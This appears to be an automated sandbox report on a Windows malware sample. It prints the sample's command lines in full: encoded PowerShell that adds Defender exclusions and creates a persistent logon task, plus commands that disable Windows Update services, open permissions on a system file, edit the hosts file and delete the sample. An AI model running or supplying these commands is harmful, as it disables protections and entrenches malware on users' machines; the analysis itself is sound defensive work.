Analysis
-
max time kernel
295s -
max time network
183s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
30-08-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
Resource
win7-20220812-en
General
-
Target
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
-
Size
2.2MB
-
MD5
d5dfb8447ced11274942ace31b4279d8
-
SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c
-
SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
-
SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
-
SSDEEP
49152:NZMzod1k0XlJTfu7lCwMBLEUGu20S2hnnRYKiPCZYj8bkN2P:N2C1k+bMlCwWl2qhnnRYKECZYI44
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Drops file in Drivers directory 2 IoCs
Processes:
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exeupdates.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe File opened for modification C:\Windows\system32\drivers\etc\hosts updates.exe -
Executes dropped EXE 1 IoCs
Processes:
updates.exepid process 4584 updates.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4192 takeown.exe 4172 icacls.exe 2000 takeown.exe 2272 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2000 takeown.exe 2272 icacls.exe 4192 takeown.exe 4172 icacls.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1604 sc.exe 1668 sc.exe 5104 sc.exe 1992 sc.exe 4436 sc.exe 4060 sc.exe 3864 sc.exe 2108 sc.exe 4884 sc.exe 5100 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1184 reg.exe 1732 reg.exe 4440 reg.exe 4548 reg.exe 2104 reg.exe 3368 reg.exe 4440 reg.exe 4460 reg.exe 1932 reg.exe 3728 reg.exe 4968 reg.exe 4388 reg.exe 4468 reg.exe 4684 reg.exe 3424 reg.exe 5004 reg.exe 1232 reg.exe 4508 reg.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exe5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exepowershell.exepowershell.exepid process 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 4928 powershell.exe 4928 powershell.exe 4928 powershell.exe 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe 852 powershell.exe 852 powershell.exe 852 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 1788 powershell.exe Token: SeIncreaseQuotaPrivilege 1788 powershell.exe Token: SeSecurityPrivilege 1788 powershell.exe Token: SeTakeOwnershipPrivilege 1788 powershell.exe Token: SeLoadDriverPrivilege 1788 powershell.exe Token: SeSystemProfilePrivilege 1788 powershell.exe Token: SeSystemtimePrivilege 1788 powershell.exe Token: SeProfSingleProcessPrivilege 1788 powershell.exe Token: SeIncBasePriorityPrivilege 1788 powershell.exe Token: SeCreatePagefilePrivilege 1788 powershell.exe Token: SeBackupPrivilege 1788 powershell.exe Token: SeRestorePrivilege 1788 powershell.exe Token: SeShutdownPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeSystemEnvironmentPrivilege 1788 powershell.exe Token: SeRemoteShutdownPrivilege 1788 powershell.exe Token: SeUndockPrivilege 1788 powershell.exe Token: SeManageVolumePrivilege 1788 powershell.exe Token: 33 1788 powershell.exe Token: 34 1788 powershell.exe Token: 35 1788 powershell.exe Token: 36 1788 powershell.exe Token: SeShutdownPrivilege 3472 powercfg.exe Token: SeCreatePagefilePrivilege 3472 powercfg.exe Token: SeShutdownPrivilege 3040 powercfg.exe Token: SeCreatePagefilePrivilege 3040 powercfg.exe Token: SeShutdownPrivilege 1300 powercfg.exe Token: SeCreatePagefilePrivilege 1300 powercfg.exe Token: SeShutdownPrivilege 2000 powercfg.exe Token: SeCreatePagefilePrivilege 2000 powercfg.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeTakeOwnershipPrivilege 4192 takeown.exe Token: SeIncreaseQuotaPrivilege 4928 powershell.exe Token: SeSecurityPrivilege 4928 powershell.exe Token: SeTakeOwnershipPrivilege 4928 powershell.exe Token: SeLoadDriverPrivilege 4928 powershell.exe Token: SeSystemProfilePrivilege 4928 powershell.exe Token: SeSystemtimePrivilege 4928 powershell.exe Token: SeProfSingleProcessPrivilege 4928 powershell.exe Token: SeIncBasePriorityPrivilege 4928 powershell.exe Token: SeCreatePagefilePrivilege 4928 powershell.exe Token: SeBackupPrivilege 4928 powershell.exe Token: SeRestorePrivilege 4928 powershell.exe Token: SeShutdownPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeSystemEnvironmentPrivilege 4928 powershell.exe Token: SeRemoteShutdownPrivilege 4928 powershell.exe Token: SeUndockPrivilege 4928 powershell.exe Token: SeManageVolumePrivilege 4928 powershell.exe Token: 33 4928 powershell.exe Token: 34 4928 powershell.exe Token: 35 4928 powershell.exe Token: 36 4928 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 powershell.exe Token: SeSecurityPrivilege 4928 powershell.exe Token: SeTakeOwnershipPrivilege 4928 powershell.exe Token: SeLoadDriverPrivilege 4928 powershell.exe Token: SeSystemProfilePrivilege 4928 powershell.exe Token: SeSystemtimePrivilege 4928 powershell.exe Token: SeProfSingleProcessPrivilege 4928 powershell.exe Token: SeIncBasePriorityPrivilege 4928 powershell.exe Token: SeCreatePagefilePrivilege 4928 powershell.exe Token: SeBackupPrivilege 4928 powershell.exe Token: SeRestorePrivilege 4928 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2716 wrote to memory of 1788 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe powershell.exe PID 2716 wrote to memory of 1788 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe powershell.exe PID 2716 wrote to memory of 3592 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 3592 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 5040 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 5040 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 3592 wrote to memory of 4436 3592 cmd.exe sc.exe PID 3592 wrote to memory of 4436 3592 cmd.exe sc.exe PID 3592 wrote to memory of 4060 3592 cmd.exe sc.exe PID 3592 wrote to memory of 4060 3592 cmd.exe sc.exe PID 5040 wrote to memory of 3472 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 3472 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 3040 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 3040 5040 cmd.exe powercfg.exe PID 3592 wrote to memory of 1604 3592 cmd.exe sc.exe PID 3592 wrote to memory of 1604 3592 cmd.exe sc.exe PID 2716 wrote to memory of 4928 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe powershell.exe PID 2716 wrote to memory of 4928 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe powershell.exe PID 5040 wrote to memory of 1300 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 1300 5040 cmd.exe powercfg.exe PID 3592 wrote to memory of 1668 3592 cmd.exe sc.exe PID 3592 wrote to memory of 1668 3592 cmd.exe sc.exe PID 5040 wrote to memory of 2000 5040 cmd.exe powercfg.exe PID 5040 wrote to memory of 2000 5040 cmd.exe powercfg.exe PID 3592 wrote to memory of 5104 3592 cmd.exe sc.exe PID 3592 wrote to memory of 5104 3592 cmd.exe sc.exe PID 3592 wrote to memory of 4440 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4440 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4388 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4388 3592 cmd.exe reg.exe PID 3592 wrote to memory of 5004 3592 cmd.exe reg.exe PID 3592 wrote to memory of 5004 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4468 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4468 3592 cmd.exe reg.exe PID 3592 wrote to memory of 1232 3592 cmd.exe reg.exe PID 3592 wrote to memory of 1232 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4192 3592 cmd.exe takeown.exe PID 3592 wrote to memory of 4192 3592 cmd.exe takeown.exe PID 3592 wrote to memory of 4172 3592 cmd.exe icacls.exe PID 3592 wrote to memory of 4172 3592 cmd.exe icacls.exe PID 2716 wrote to memory of 4652 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 4652 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 4144 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 2716 wrote to memory of 4144 2716 5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe cmd.exe PID 4652 wrote to memory of 3736 4652 cmd.exe schtasks.exe PID 4652 wrote to memory of 3736 4652 cmd.exe schtasks.exe PID 4144 wrote to memory of 3260 4144 cmd.exe choice.exe PID 4144 wrote to memory of 3260 4144 cmd.exe choice.exe PID 3592 wrote to memory of 4508 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4508 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4684 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4684 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4548 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4548 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4460 3592 cmd.exe reg.exe PID 3592 wrote to memory of 4460 3592 cmd.exe reg.exe PID 3592 wrote to memory of 896 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 896 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 512 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 512 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 416 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 416 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 4676 3592 cmd.exe schtasks.exe PID 3592 wrote to memory of 4676 3592 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "OneDrivesSystems"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "OneDrivesSystems"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exeC:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
